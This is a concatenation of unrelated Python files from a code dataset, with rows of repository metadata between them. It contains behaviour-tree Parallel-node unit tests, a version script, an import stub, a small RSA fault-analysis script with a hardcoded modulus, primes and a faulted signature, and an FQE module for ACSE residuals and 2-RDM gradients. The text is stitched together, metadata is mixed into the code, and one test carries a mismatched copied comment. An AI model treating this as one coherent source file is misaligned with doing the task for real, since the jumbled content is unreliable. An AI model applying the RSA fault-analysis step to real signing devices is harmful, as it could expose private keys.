par = make_parallel_failure_tolerance(1, 0)\
.add_child(self.failer)\
.add_child(self.run_then_fail)
par.setup()
# the node tolerates 1 failure,
# so it fails at the first tick,
# even if it could still get 1 success from the other child
self.assertEqual(par.tick(), Node.FAILED)
self.assertEqual(self.failer.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 1)
par.shutdown()
def testBarrierSuccess(self):
par = make_parallel_failure_tolerance(2, 2)\
.add_child(self.succeeder)\
.add_child(self.run_then_succeed)
par.setup()
# run_then_succeed returns RUNNING on the first tick, so we
# need a second tick
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(par.tick(), Node.SUCCEEDED)
# succeeder should not be ticked again as long as
# run_then_succeed has not produced a result
self.assertEqual(self.succeeder.tick_count, 1)
self.assertEqual(self.run_then_succeed.tick_count, 2)
self.assertEqual(par.tick(), Node.RUNNING)
# The Parallel should reset its children after producing a
# result
self.assertEqual(self.succeeder.reset_count, 1)
self.assertEqual(self.run_then_succeed.reset_count, 1)
self.assertEqual(par.tick(), Node.SUCCEEDED)
self.assertEqual(self.succeeder.tick_count, 2)
self.assertEqual(self.run_then_succeed.tick_count, 4)
par.shutdown()
def testBarrierFailure(self):
par = make_parallel_failure_tolerance(2, 0)\
.add_child(self.succeeder)\
.add_child(self.run_then_fail)
par.setup()
# run_then_fail returns RUNNING on the first tick, so we
# need a second tick
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(par.tick(), Node.FAILED)
# succeeder should not be ticked again as long as
# run_then_fail has not produced a result
self.assertEqual(self.succeeder.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 2)
self.assertEqual(par.tick(), Node.RUNNING)
# The Parallel should reset its children after producing a
# result
self.assertEqual(self.succeeder.reset_count, 1)
self.assertEqual(self.run_then_fail.reset_count, 1)
self.assertEqual(par.tick(), Node.FAILED)
self.assertEqual(self.succeeder.tick_count, 2)
self.assertEqual(self.run_then_fail.tick_count, 4)
par.shutdown()
def testHeurekaSuccess(self):
"""The "Heureka" configuration returns SUCCEEDED with just a single succeeding child"""
par = make_parallel_failure_tolerance(1, 1)\
.add_child(self.succeeder)\
.add_child(self.run_then_fail)
par.setup()
# Because succeeder immediately succeeds, the Parallel
# succeeds and resets run_then_fail before the second tick
self.assertEqual(par.tick(), Node.SUCCEEDED)
self.assertEqual(self.succeeder.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 1)
self.assertEqual(par.tick(), Node.SUCCEEDED)
self.assertEqual(self.succeeder.reset_count, 1)
self.assertEqual(self.run_then_fail.reset_count, 1)
self.assertEqual(self.succeeder.tick_count, 2)
self.assertEqual(self.run_then_fail.tick_count, 2)
par.shutdown()
def testHeurekaFailure(self):
"""The "Heureka" configuration returns FAILED only when all children fail"""
par = make_parallel_failure_tolerance(1, 1)\
.add_child(self.failer)\
.add_child(self.run_then_fail)
par.setup()
# Because succeeder immediately succeeds, the Parallel
# succeeds and resets run_then_fail before the second tick
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(self.failer.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 1)
self.assertEqual(par.tick(), Node.FAILED)
# Again, failer should not be ticked again before run_then_fail produces a result
self.assertEqual(self.failer.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 2)
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(self.failer.reset_count, 1)
self.assertEqual(self.run_then_fail.reset_count, 1)
self.assertEqual(par.tick(), Node.FAILED)
self.assertEqual(self.failer.tick_count, 2)
self.assertEqual(self.run_then_fail.tick_count, 4)
par.shutdown()
def testParallelUtilityCalculation(self):
par = make_parallel_failure_tolerance(1, 1)\
.add_child(self.cheap_success)\
.add_child(self.cheap_fail)
expected_bounds = UtilityBounds(
can_execute=True,
has_lower_bound_success=True,
has_upper_bound_success=True,
has_lower_bound_failure=True,
has_upper_bound_failure=True)
cheap_success_bounds = self.cheap_success.calculate_utility()
cheap_fail_bounds = self.cheap_fail.calculate_utility()
expected_bounds.lower_bound_success = cheap_success_bounds.lower_bound_success
expected_bounds.upper_bound_success = cheap_fail_bounds.upper_bound_success
expected_bounds.lower_bound_failure = (cheap_success_bounds.lower_bound_failure
+ cheap_fail_bounds.lower_bound_failure)
expected_bounds.upper_bound_failure = (cheap_success_bounds.upper_bound_failure
+ cheap_fail_bounds.upper_bound_failure)
self.assertEqual(par.calculate_utility(), expected_bounds)
par = make_parallel_failure_tolerance(2, 0)\
.add_child(self.cheap_success)\
.add_child(self.cheap_fail)
# Now that we need two successes, success and failure are
# basically swapped
expected_bounds.lower_bound_success = (cheap_success_bounds.lower_bound_success
+ cheap_fail_bounds.lower_bound_success)
expected_bounds.upper_bound_success = (cheap_success_bounds.upper_bound_success
+ cheap_fail_bounds.upper_bound_success)
expected_bounds.lower_bound_failure = cheap_fail_bounds.lower_bound_failure
expected_bounds.upper_bound_failure = cheap_success_bounds.upper_bound_failure
self.assertEqual(par.calculate_utility(), expected_bounds)
def testParallelUtilityCalculationCanNotExecute(self):
par = make_parallel_failure_tolerance(1, 0)\
.add_child(self.can_not_execute)
expected_bounds = UtilityBounds(
can_execute=False,
has_lower_bound_success=False,
has_upper_bound_success=False,
has_lower_bound_failure=False,
has_upper_bound_failure=False)
self.assertEqual(par.calculate_utility(), expected_bounds)
| 41.611418 | 97 | 0.631334 | 2,569 | 22,595 | 5.303231 | 0.101207 | 0.1101 | 0.078097 | 0.051674 | 0.870669 | 0.857017 | 0.853934 | 0.850117 | 0.846301 | 0.846301 | 0 | 0.009807 | 0.282452 | 22,595 | 542 | 98 | 41.688192 | 0.830506 | 0.170524 | 0 | 0.94051 | 0 | 0 | 0.069693 | 0.034766 | 0 | 0 | 0 | 0 | 0.294618 | 1 | 0.05949 | false | 0 | 0.016997 | 0.005666 | 0.087819 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28c4014882aeb75f0fd935a12fd3111ffbd078fa | 74 | py | Python | tools/print_version_number.py | sizmailov/pyxmolpp2 | 9395ba1b1ddc957e0b33dc6decccdb711e720764 | [
"MIT"
] | 4 | 2020-06-24T11:07:57.000Z | 2022-01-15T23:00:30.000Z | tools/print_version_number.py | sizmailov/pyxmolpp2 | 9395ba1b1ddc957e0b33dc6decccdb711e720764 | [
"MIT"
] | 84 | 2018-04-22T12:29:31.000Z | 2020-06-17T15:03:37.000Z | tools/print_version_number.py | sizmailov/pyxmolpp2 | 9395ba1b1ddc957e0b33dc6decccdb711e720764 | [
"MIT"
] | 6 | 2018-06-04T09:16:26.000Z | 2022-03-12T11:05:54.000Z | from write_version_info import print_version_number
print_version_number() | 37 | 51 | 0.918919 | 11 | 74 | 5.636364 | 0.636364 | 0.387097 | 0.580645 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 74 | 2 | 52 | 37 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 1 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
28d86a4c12410dd09779eb8b6dfe4ae3276681ac | 238 | py | Python | target_extraction/allen/modules/target_position_weight/__init__.py | apmoore1/target-extraction | 4139ecdc432411fcc4ed2723f4165e7dae93544d | [
"Apache-2.0"
] | 5 | 2019-07-27T13:57:47.000Z | 2021-06-16T13:17:44.000Z | target_extraction/allen/modules/target_position_weight/__init__.py | apmoore1/target-extraction | 4139ecdc432411fcc4ed2723f4165e7dae93544d | [
"Apache-2.0"
] | 26 | 2019-05-01T11:56:35.000Z | 2020-06-18T16:06:40.000Z | target_extraction/allen/modules/target_position_weight/__init__.py | apmoore1/target-extraction | 4139ecdc432411fcc4ed2723f4165e7dae93544d | [
"Apache-2.0"
] | 1 | 2019-07-11T07:16:09.000Z | 2019-07-11T07:16:09.000Z | from target_extraction.allen.modules.target_position_weight.target_position_weight import TargetPositionWeight
from target_extraction.allen.modules.target_position_weight.relative_target_position_weight import RelativeTargetPositionWeight | 119 | 127 | 0.936975 | 27 | 238 | 7.851852 | 0.407407 | 0.264151 | 0.377358 | 0.235849 | 0.490566 | 0.490566 | 0.490566 | 0.490566 | 0 | 0 | 0 | 0 | 0.029412 | 238 | 2 | 127 | 119 | 0.917749 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
28f79fe35647bdb901de1ccb693d0e9b81eb7a9e | 1,868 | py | Python | factor_signature.py | aditi-gupta/rsa-mbedtls | f1f226b8456ebfa868b0e04ffed14ac507637796 | [
"Apache-2.0"
] | null | null | null | factor_signature.py | aditi-gupta/rsa-mbedtls | f1f226b8456ebfa868b0e04ffed14ac507637796 | [
"Apache-2.0"
] | null | null | null | factor_signature.py | aditi-gupta/rsa-mbedtls | f1f226b8456ebfa868b0e04ffed14ac507637796 | [
"Apache-2.0"
] | null | null | null | e = int("010001", 16)
s = int("7BAFF51CA54182F5A70181B0EC1F8603C1A39324D5A2CB49422886AE1FFDB49E009AF19ABD7D772E199BEC3046690494134B75E1201E6856D99887DCA32DBB403CF99553678D458748AA43C90A387AD3FF767F7314BF05FC1880347072706809BF3BCBDB59EA54032E5485869E7063B3EFDA8C5A6D19D1A5B3B279F2E70AF90B4C2FE485856639273539EEE50B6232EFC9D75903884F315FC377D842F948088F7E259F36BD4FECD1EB770D8FB24CE66E945E57DDE29E3EF1FB327C675940BCEE04A70D18BDC74BDE31CC32894280E2722A19B7D5FE15474E9ED5DCD51C264C7F8FA13A5372698752AB0658D857181435B430D58746FA64BE492E8D3D7D9F33A2", 16) #you get this when you replace *0x6df4e0 with 0x8
m = int("3031300d0609608648016503040201050004207e6bb673f061cfd23cba009e648143fb07ac77dcd1681f6a9af9d5fe7c0f7f4b", 16)
n = int("AE1EC41FDD978C18CB43F9587F9B85DF804603100611497DCB445D157E44E717C78D53FAC3644DEA302645F6CFF852A785C3DAEA525BE01A4B1960D6512D97C677436ED17D03A55DDD8E41D737456C2B1512D533806EB048C5570269CBDFABB5E335821CE69C892A825A3896FC46990A8F6FECC759DAD9D6FD76BBF55BAA34B0789CACE898B6CC8CDBB50A0BFE7073A31DAF0B67845F76B71D42942B03FC02D6D68789C6CEF502C39AA0FB392E5E84BD1581E7295BDF6C45463FEA20A5220413381B82A72F95B1BB29AC6E833B70EB5B9F9D43B4D56A94ECBD02C1CBC8C8EED903485BD2A379A8B81B8FE20216EE6019A5F19656A483CCD9C23EB3B17678050B", 16)
p = int("F5D2772FA3DA0B5AB6A0DEE2897983D6EB0EB9B63A94860EAD14271669C2DDEB089569971093DBBDC46C7E230709FE1BE1967051FB6113F4D836CF792AE3893E487851C500F022E942E2C91FF5BC391E5401F2C41CFE9744AA76048578CC1FEB59B0B705834EE672CE7AE53B06D78831A3701BB58A0746C3B492D8B7DCDDB133", 16)
q = int("B5544FFA117E94D9CA58FF9DB5CBA8E498D4B8192CA578C2D4E1D8828B0329EDE2CA737BBBB3AC25DD11DF04EBE1971D25B0AC3C73D26018A3C52381A520EACEF826ACBA73EBB5EA3569872FEBEC53C6B188FA6DD3B8343C22652C4A5CF2FC34EBCEA888037DBEDA22C55076A15AE1A8827F620AA64A775021851B0BF2808CC9", 16)
# print (s%n)
print ((pow(s, e)-m)%q)
# print (s%q)
# print n%p
# print (n%q) | 155.666667 | 577 | 0.941649 | 51 | 1,868 | 34.490196 | 0.470588 | 0.006822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.57967 | 0.025696 | 1,868 | 12 | 578 | 155.666667 | 0.386813 | 0.050321 | 0 | 0 | 0 | 0 | 0.928814 | 0.925424 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e903dc507222996d3f19c9a39f65a66f409182ea | 33,139 | py | Python | src/fqe/algorithm/brillouin_calculator.py | rmlarose/OpenFermion-FQE | 54489126725fe3bb83218b6fde9d44f6cf130359 | [
"Apache-2.0"
] | null | null | null | src/fqe/algorithm/brillouin_calculator.py | rmlarose/OpenFermion-FQE | 54489126725fe3bb83218b6fde9d44f6cf130359 | [
"Apache-2.0"
] | null | null | null | src/fqe/algorithm/brillouin_calculator.py | rmlarose/OpenFermion-FQE | 54489126725fe3bb83218b6fde9d44f6cf130359 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Infrastructure for compute [rdo, A] with FQE. RDO is a 2-body operator
and A is a 2-body operator."""
import copy
from itertools import product
import numpy as np
import openfermion as of
import fqe
from fqe.wavefunction import Wavefunction
from fqe.hamiltonians.restricted_hamiltonian import RestrictedHamiltonian
try:
from joblib import Parallel, delayed
PARALLELIZABLE = True
except ImportError:
PARALLELIZABLE = False
def get_fermion_op(coeff_tensor) -> of.FermionOperator:
r"""Returns an openfermion.FermionOperator from the given coeff_tensor.
Given A[i, j, k, l] of A = \sum_{ijkl}A[i, j, k, l]i^ j^ k^ l
return the FermionOperator A.
Args:
coeff_tensor: Coefficients for 4-mode operator
Returns:
A FermionOperator object
"""
if len(coeff_tensor.shape) == 4:
nso = coeff_tensor.shape[0]
fermion_op = of.FermionOperator()
for p, q, r, s in product(range(nso), repeat=4):
if p == q or r == s:
continue
op = ((p, 1), (q, 1), (r, 0), (s, 0))
fop = of.FermionOperator(op, coefficient=coeff_tensor[p, q, r, s])
fermion_op += fop
return fermion_op
elif len(coeff_tensor.shape) == 2:
nso = coeff_tensor.shape[0]
fermion_op = of.FermionOperator()
for p, q in product(range(nso), repeat=2):
oper = ((p, 1), (q, 0))
fop = of.FermionOperator(oper, coefficient=coeff_tensor[p, q])
fermion_op += fop
return fermion_op
else:
raise ValueError(
"Arg `coeff_tensor` should have dimension 2 or 4 but has dimension"
f" {len(coeff_tensor.shape)}.")
def get_acse_residual_fqe(fqe_wf: Wavefunction, fqe_ham: RestrictedHamiltonian,
norbs: int) -> np.ndarray:
"""Get the ACSE block by using reduced density operators that are Sz spin
adapted
R^{ij}_{lk} = <psi | [i^ j^ k l, A] | psi>
alpha-alpha, beta-beta, alpha-beta, and beta-alpha blocks
we do not compression over alpha-alpha or beta-beta so these are still
norbs**2 in linear dimension. In other words, we do computation on
elements we know should be zero. This is for simplicity in the code.
Args:
fqe_wf: fqe.Wavefunction object to calculate expectation value with
fqe_ham: fqe.RestrictedHamiltonian operator corresponding to a chemical
Hamiltonian
norbs: Number of orbitals. Number of spatial orbitals
Returns:
Gradient of the i^ j^ k l operator
"""
acse_aa = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
acse_bb = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
acse_ab = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
fqe_appA = fqe_wf.apply(fqe_ham)
for p, q, r, s in product(range(norbs), repeat=4):
# alpha-alpha block real
if p != q and r != s:
rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = np.conjugate(val1)
acse_aa[p, q, r, s] = (val2 - val1) / 2j
# alpha-alpha block imag
rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = np.conjugate(val1)
acse_aa[p, q, r, s] += (val2 - val1) / 2
# beta-beta block real
rdo = (
(2 * p + 1, 1),
(2 * q + 1, 1),
(2 * r + 1, 0),
(2 * s + 1, 0),
)
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = np.conjugate(val1)
acse_bb[p, q, r, s] += (val2 - val1) / 2j
# beta-beta block imag
rdo = (
(2 * p + 1, 1),
(2 * q + 1, 1),
(2 * r + 1, 0),
(2 * s + 1, 0),
)
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = np.conjugate(val1)
acse_bb[p, q, r, s] += (val2 - val1) / 2
# alpha-beta block real
rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = np.conjugate(val1)
acse_ab[p, q, r, s] += (val2 - val1) / 2j
# alpha-beta block imag
rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = np.conjugate(val1) # fqe.util.vdot(fqe_wf.apply(rdo), fqe_appA)
acse_ab[p, q, r, s] += (val2 - val1) / 2
# unroll residual blocks into full matrix
acse_residual = np.zeros((2 * norbs, 2 * norbs, 2 * norbs, 2 * norbs),
dtype=np.complex128)
acse_residual[::2, ::2, ::2, ::2] = acse_aa
acse_residual[1::2, 1::2, 1::2, 1::2] = acse_bb
acse_residual[::2, 1::2, 1::2, ::2] = acse_ab
acse_residual[::2, 1::2, ::2, 1::2] = np.einsum("ijkl->ijlk", -acse_ab)
acse_residual[1::2, ::2, ::2, 1::2] = np.einsum("ijkl->jilk", acse_ab)
acse_residual[1::2, ::2, 1::2, ::2] = np.einsum(
"ijkl->ijlk", -acse_residual[1::2, ::2, ::2, 1::2])
return acse_residual
def get_tpdm_grad_fqe(fqe_wf, acse_res_tensor, norbs):
r"""Compute the acse gradient <psi [rdo, A] psi>
alpha-alpha, beta-beta, alpha-beta, and beta-alpha blocks
d D^{pq}_{rs} / d \lambda = <psi(lamba)|[p^ q^ s r, A]| psi(lambda)>
Args:
fqe_wf: fqe.Wavefunction object to calculate expectation value with
acse_res_tensor: fqe.RestrictedHamiltonian operator corresponding to a chemical
Hamiltonian
norbs: Number of orbitals. Number of spatial orbitals
Returns:
Gradient of the i^ j^ k l operator
"""
four_tensor_counter = np.zeros_like(acse_res_tensor)
s_ops = []
s_op_total = of.FermionOperator()
for p, q, r, s in product(range(2 * norbs), repeat=4):
if p * 2 * norbs + q >= s * 2 * norbs + r:
if p * 2 * norbs + q != s * 2 * norbs + r:
four_tensor_counter[p, q, r, s] += 1
four_tensor_counter[s, r, q, p] += 1
if abs(acse_res_tensor[p, q, r, s]) > 1.0e-12:
op = ((p, 1), (q, 1), (r, 0), (s, 0))
fop1 = of.FermionOperator(
op, coefficient=acse_res_tensor[p, q, r, s])
op = ((s, 1), (r, 1), (q, 0), (p, 0))
fop2 = of.FermionOperator(
op, coefficient=acse_res_tensor[s, r, q, p])
s_ops.append((fop1, fop2))
s_op_total += fop2
s_op_total += fop1
else:
four_tensor_counter[p, q, r, s] += 1
if abs(acse_res_tensor[p, q, r, s]) > 1.0e-12:
op = ((p, 1), (q, 1), (r, 0), (s, 0))
fop1 = of.FermionOperator(
op, coefficient=acse_res_tensor[p, q, r, s])
s_ops.append((fop1, of.FermionOperator()))
s_op_total += fop1
assert np.allclose(four_tensor_counter, 1)
fqe_appS = copy.deepcopy(fqe_wf)
fqe_appS.set_wfn("zero")
for op1, op2 in s_ops:
fqe_appS += fqe_wf.apply(1j * (op1 + op2))
acse_aa = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
acse_bb = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
acse_ab = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
for p, q, r, s in product(range(norbs), repeat=4):
# alpha-beta block real
rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
fqe_wf_rdo = fqe_wf.apply(rdo)
val1 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val2 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_ab[p, q, r, s] += (val2 - val1) / 2j
# alpha-beta block imag
rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
fqe_wf_rdo = fqe_wf.apply(rdo)
val3 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val4 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_ab[p, q, r, s] += (val4 - val3) / -2
# alpha-alpha block real
rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
fqe_wf_rdo = fqe_wf.apply(rdo)
val1 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val2 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_aa[p, q, r, s] += (val2 - val1) / 2j
# alpha-alpha block imag
rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
fqe_wf_rdo = fqe_wf.apply(rdo)
val3 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val4 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_aa[p, q, r, s] += (val4 - val3) / -2
# beta-beta block real
rdo = ((2 * p + 1, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s + 1, 0))
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
fqe_wf_rdo = fqe_wf.apply(rdo)
val1 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val2 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_bb[p, q, r, s] += (val2 - val1) / 2j
# beta-beta block imag
rdo = ((2 * p + 1, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s + 1, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
fqe_wf_rdo = fqe_wf.apply(rdo)
val3 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
val4 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
acse_bb[p, q, r, s] += (val4 - val3) / -2
# unroll residual blocks into full matrix
acse_residual = np.zeros((2 * norbs, 2 * norbs, 2 * norbs, 2 * norbs),
dtype=np.complex128)
acse_residual[::2, ::2, ::2, ::2] = acse_aa
acse_residual[1::2, 1::2, 1::2, 1::2] = acse_bb
acse_residual[::2, 1::2, 1::2, ::2] = acse_ab
acse_residual[::2, 1::2, ::2, 1::2] = np.einsum("ijkl->ijlk", -acse_ab)
acse_residual[1::2, ::2, ::2, 1::2] = np.einsum("ijkl->jilk", acse_ab)
acse_residual[1::2, ::2, 1::2, ::2] = np.einsum(
"ijkl->ijlk", -acse_residual[1::2, ::2, ::2, 1::2])
return acse_residual
def _acse_residual_atomic(p, q, r, s, fqe_appA, fqe_wf):
"""Internal function for comuting the residual"""
rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = fqe.util.vdot(fqe_wf.apply(rdo), fqe_appA)
acse_aa_i = (val2 - val1) / 2j
# alpha-alpha block imag
rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = fqe.util.vdot(fqe_wf.apply(rdo), fqe_appA)
acse_aa_r = (val2 - val1) / 2
# beta-beta block real
rdo = ((2 * p + 1, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s + 1, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = fqe.util.vdot(fqe_wf.apply(rdo), fqe_appA)
acse_bb_i = (val2 - val1) / 2j
# beta-beta block imag
rdo = ((2 * p + 1, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s + 1, 0))
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = fqe.util.vdot(fqe_wf.apply(rdo), fqe_appA)
acse_bb_r = (val2 - val1) / 2
# alpha-beta block real
rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
rdo = 1j * (of.FermionOperator(rdo) -
of.hermitian_conjugated(of.FermionOperator(rdo)))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = fqe.util.vdot(fqe_wf.apply(rdo), fqe_appA)
acse_ab_i = (val2 - val1) / 2j
# alpha-beta block imag
rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
of.FermionOperator(rdo))
val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
val2 = fqe.util.vdot(fqe_wf.apply(rdo), fqe_appA)
acse_ab_r = (val2 - val1) / 2
return (
p,
q,
r,
s,
acse_aa_i,
acse_aa_r,
acse_bb_i,
acse_bb_r,
acse_ab_i,
acse_ab_r,
)
def get_acse_residual_fqe_parallel(fqe_wf, fqe_ham, norbs):
"""Get the ACSE block by using reduced density operators that are Sz spin
adapted
R^{ij}_{lk} = <psi | [i^ j^ k l, A] | psi>
alpha-alpha, beta-beta, alpha-beta, and beta-alpha blocks
we do not compression over alpha-alpha or beta-beta so these are still
norbs**2 in linear dimension. In other words, we do computation on
elements we know should be zero. This is for simplicity in the code.
Args:
fqe_wf: fqe.Wavefunction object to calculate expectation value with
fqe_ham: fqe.RestrictedHamiltonian operator corresponding to a chemical
Hamiltonian
norbs: Number of orbitals. Number of spatial orbitals
Returns:
Gradient of the i^ j^ k l operator
"""
if not PARALLELIZABLE:
raise ImportError("Joblib is not available")
acse_aa = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
acse_bb = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
acse_ab = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
fqe_appA = fqe_wf.apply(fqe_ham)
with Parallel(n_jobs=11, batch_size=norbs) as parallel:
result = parallel(
delayed(_acse_residual_atomic)(p, q, r, s, fqe_appA, fqe_wf)
for p, q, r, s in product(range(norbs), repeat=4))
for resval in result:
p, q, r, s = resval[:4]
acse_aa[p, q, r, s] = resval[4] + resval[5]
acse_bb[p, q, r, s] = resval[6] + resval[7]
acse_ab[p, q, r, s] = resval[8] + resval[9]
# alpha-alpha block real
# unroll residual blocks into full matrix
acse_residual = np.zeros((2 * norbs, 2 * norbs, 2 * norbs, 2 * norbs),
dtype=np.complex128)
acse_residual[::2, ::2, ::2, ::2] = acse_aa
acse_residual[1::2, 1::2, 1::2, 1::2] = acse_bb
acse_residual[::2, 1::2, 1::2, ::2] = acse_ab
acse_residual[::2, 1::2, ::2, 1::2] = np.einsum("ijkl->ijlk", -acse_ab)
acse_residual[1::2, ::2, ::2, 1::2] = np.einsum("ijkl->jilk", acse_ab)
acse_residual[1::2, ::2, 1::2, ::2] = np.einsum(
"ijkl->ijlk", -acse_residual[1::2, ::2, ::2, 1::2])
return acse_residual
def _get_tpdm_grad_fqe_atomic(p, q, r, s, fqe_appS, fqe_wf):
"""Internal function for 2-RDM grad parallel"""
# alpha-beta block real
rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
